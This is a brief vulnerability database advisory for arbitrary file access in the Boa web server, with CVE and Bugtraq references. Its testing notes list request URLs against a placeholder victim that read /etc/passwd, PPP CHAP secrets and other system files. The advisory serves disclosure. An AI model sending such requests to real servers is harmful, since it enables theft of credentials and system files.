Boa Web Server Direct Request Arbitrary File Access

2003-05-09T00:13:26
ID OSVDB:15022
Type osvdb
Reporter OSVDB
Modified 2003-05-09T00:13:26

Description

Manual Testing Notes

http://[victim]/etc/passwd http://[victim]/etc/hosts http://[victim]/bin/ http://[victim]/dev/ http://[victim]/var/ppp/chap-secrets http://[victim]/bin/sh

References:

Related OSVDB ID: 15023 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2003-05/0106.html Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-03/0653.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-05/0302.html Keyword: EXPL-A-2005-002 CVE-2005-0864 Bugtraq ID: 12864